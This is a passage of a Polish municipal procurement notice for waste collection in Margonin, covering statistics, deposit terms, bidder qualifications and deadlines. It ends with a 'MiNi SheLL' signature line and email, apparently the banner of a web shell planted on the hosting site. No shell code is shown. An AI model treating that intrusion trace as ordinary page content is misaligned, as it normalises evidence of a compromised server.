1)Margonin to gmina miejsko - wiejska o powierzchni 122km2. W skład gminy wchodzi 21 miejscowości, charakteryzujących się przeważającą zabudową zwartą. W każdej miejscowości znajduje się zabudowa mniej lub bardziej rozproszona.
2)Liczba osób zamieszkałych na dzień 14.2.2014roku. wynosi 5688 mieszkańców (liczba określona na podstawie otrzymanych od właścicieli nieruchomości deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi).
3)Przyrost naturalny i migracje ludności w Gminie Margonin w latach 2010 - 2013:
2010		2011		2012		2013
Akty zgonu		 56		65		61	62
Akty urodzenia	 84		68		80		76
Zameldowania:
Stałe			114		95		95	120
Czasowe		17		39		104		100
Wymeldowania:
Stałe			140		143		112	42
Czasowe		89		94		107		67
Liczba ludności	6378		6328		6317		6315
4)Z analizy deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi wynika, że około 3% społeczeństwa będzie oddawało odpady w sposób niesegregowanych a 97% w sposób selektywny.
5)Występujące rodzaje i pojemności pojemników (kubłów) na odpady, przeznaczone
do gromadzenia zmieszanych odpadów komunalnych na terenie nieruchomości Gminy:
metalowe lub z tworzywa sztucznego o pojemności 120 l, 240 l, 1100l oraz KP5, KP7, KP10 o pojemności od 5m3 do 10m3,
6)Poniższa tabela przedstawia ilości (w Mg) odbieranych odpadów komunalnych w Gminie Margonin, w latach 2010 - 2013:
Rodzaj odpadów	2010rok	2011 rok	2012 rok	2013 rok
Odzież			brak danych	4,26		3,7	2,8
Papier			20,39		29,18		22,00	18,99
Szkło			58,58		84,41		78,00	112,58
Plastik			21,27		30,94		34,5	32,9
Metale			brak danych	brak danych	brak danych1,05
Drewno		brak danych	brak danych	brak danych	1,95
Baterie			0,064		0,148		0,132	brak danych
AGD/RTV		5,102		6,791		6,604		3,92
Opony			brak danych	brak danych	brak danych2,86
Odpady zielone	brak danych	brak danych	brak danych	25,7
Gruz budowlany	brak danych	brak danych	brak danych	71,5
Niesegregowane (zmieszane)
odpady komunalne 	1520,19	1473,34	1381,8		1239,97
Informujemy, że ww. latach 2010-2012 na terenie Gminy Margonin nie nastąpił usystematyzowany odbiór odpadów jak:
5. Wymiana danych z Wykonawcą
1)Zamawiający na podstawie zmiany w deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi bądź nowej deklaracji będzie dokonywał bieżącej aktualizacji danych.
2)Wykonawca w przypadku uzyskania informacji o zmianie ilości mieszkańców lub zmianie ilości pojemności pojemników (na podstawie zmiany w deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi, bądź nowej deklaracji) uwzględni w swojej ewidencji (kartotece) zmiany i wyposaży nieruchomość w pojemniki, harmonogram
oraz będzie odbierać odpady zgodnie z harmonogramem, w terminie do 14 dni kalendarzowych, od otrzymania informacji, z zastrzeżeniem zasad wynikających z Roz.III ust 2.
3 Zamawiający w czasie trwania umowy, udostępni wykonawcy niezwłocznie informacje o nieruchomościach zmieniających swój status użytkowania np. z nieruchomości zamieszkałej na nieruchomość na której nie powstają odpady komunalne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.53.30.00-2, 90.51.20.00-9, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 12.000,00 zł kwota wadium          słownie: dwanaście tysięcy złotych 00/100.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: 
BS Chodzież/ oddz. Margonin 81 8945 0002 1300 0101 2000 0060 z adnotacją wadium - Świadczenie usługi odbierania odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy Gminy Margonin 
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) 
w terminie 2014-05-06, sposób przekazania: sposób przekazania: kserokopia wpłaty, kopie gwarancji i poręczeń należy załączyć do oferty oraz oryginały przedłożyć przed złożeniem oferty w pokoju nr 7. 
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
Zamawiający żąda załączenia:
- aktualnego zezwolenia Starosty na prowadzenia działalności w zakresie transportu odpadów zgodnie z ustawą z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r., poz. 21),
- aktualnego wpisu do rejestru działalności regulowanej prowadzonego przez Burmistrza Miasta i Gminy Margonin w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z ustawą z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tekst jednolity: Dz. U. z 2012r. poz. 391 z zm.),
- aktualnego wpisu do rejestru zgodne z ustawą z dnia 29 lipca 2005r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z 2005r., Nr 180, poz. 1495 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie wykonanych lub wykonywanych przez wykonawcę usług potwierdzających posiadanie wiedzy i doświadczenia - tj. realizacji co najmniej 1 usługi odpowiadającej swym rodzajem i wartością usługom stanowiącym  przedmiot zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
a) odbiór odpadów komunalnych o masie co najmniej 1.000 Mg i łącznej wartości nie mniejszej niż 200.000,00 zł brutto
Warunek zostanie uznany za spełniony na podstawie przedstawionego wykazu wykonanych usług - załącznik nr 4 do SIWZ wg rozdziału VI pkt. C1 wraz z załączeniem dowodów czy zostały wykonane lub są wykonywane należycie
Dowodami, o których mowa powyżej są:
- poświadczenie - z tym, że do usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie rozporządzeniem Ministra Środowiska w sprawie szczegółowych wymagań w zakresie zbierania odpadów komunalnych od właścicieli nieruchomości z dnia 11 stycznia 2013r.
(Dz. U. z 2013r., poz. 122) Wykonawca zobowiązany jest posiadać co najmniej 5 sztuk pojazdów:
	a) pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych
- co najmniej 2 pojazdy,
	b) pojazdy przystosowane do odbierania selektywnie zebranych odpadów
- co najmniej 2 pojazdy
	c) pojazdy do odbierania odpadów bez funkcji kom paktującej - co najmniej
1 pojazd 
	Warunek uznaje się za spełniony na podstawie przedstawionego wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy wraz z informacją o podstawie do dysponowania tymi zasobami - zał. nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wymagane jest wykazanie przez wykonawcę - opłacona polisa OC a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 200.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - wypełniony i podpisany przez wykonawcę 
Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych 
Wzór umowy- parafowany przez wykonawcę
Zobowiązanie innego podmiotu (o ile dotyczy)
pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w następującym zakresie:
a) jeżeli zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można było uniknąć ani im zapobiec,
	b) jeżeli nastąpiła siła wyższa - np. w postaci klęski żywiołowej,
	c) jeżeli warunki atmosferyczne uniemożliwiają prawidłowe wykonanie przedmiotu umowy,
	d) zmiany liczby pojemników i worków niezbędnych dla właściwej realizacji usługi.
2.2. Wykonawca występujący o zmianę umowy zobowiązany jest do udokumentowania zaistnienia przesłanek określonych w ust. 1. Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.
2.3. Zmiana postanowień zawartej umowy nastąpi za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.margonin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Margonin
ul. Kościuszki 13
64-830 Margonin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy Margonin
ul. Kościuszki 13
64-830 Margonin
pokój - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com